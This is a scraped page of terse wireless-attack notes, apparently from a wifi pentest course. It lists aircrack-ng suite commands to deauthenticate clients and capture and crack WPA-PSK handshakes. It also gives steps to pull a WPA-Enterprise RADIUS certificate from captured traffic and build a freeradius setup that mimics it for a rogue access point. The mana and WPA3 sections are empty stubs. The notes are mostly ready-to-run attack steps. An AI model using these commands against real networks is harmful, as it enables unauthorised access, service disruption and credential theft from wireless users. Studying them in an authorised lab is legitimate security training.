Attacking WPA

WPA/PSK

# Death clients and crack the handshake 
sudo airodump-ng –bssid F0:9F:C2:71:22:12 -c 6 -w wpa wlan0mon
sudo aireplay-ng –deauth 0 -a F0:9F:C2:71:22:12 wlan0mon
sudo aircrack-ng wpa.pcap -w rockyou.txt

WPA

MGT = WPA Enterprise
# Airodump-ng command and output on channel 3, focused on a BSSID to capture 4-way handshake
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthenticating associated client to get the certificate
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 wlan0mon
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# We can add display filters to show the exact frames where the certificate is given (first server, second ca)
# For each certificate, we right click and select Export Packet Bytes to save the data into a file with a .der extension
tls.handshake.type == 11
tls.handshake.certificate
wlan.bssid==E8:9F:80:03:63:4A && eap && tls.handshake.certificate
# Display information about the certificat using openssl (note Subject value)
openssl x509 -inform der -in CERTIFICATE_FILENAME -text
#  We can convert the certificat to PEM format (Optional)
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt

# Configuring freeradius & Certificate generation
sudo apt install freeradius
cd /etc/freeradius/3.0/certs
nano ca.cnf
        [certificate_authority]
        countryName             = US
        stateOrProvinceName     = CA
        localityName            = San Francisco
        organizationName        = Playtronics
        emailAddress            = ca@playtronics.com
        commonName              = "Playtronics Certificate Authority"
nano server.cnf
        [server]
        countryName             = US
        stateOrProvinceName     = CA
        localityName            = San Francisco
        organizationName        = Playtronics
        emailAddress            = admin@playtronics.com
        commonName              = "Playtronics"
rm dh
make destroycerts
make
chevron-rightmana.conf & mana.eap_userhashtag

WPA3-SAE

chevron-righthostapd-sae.confhashtag

Last updated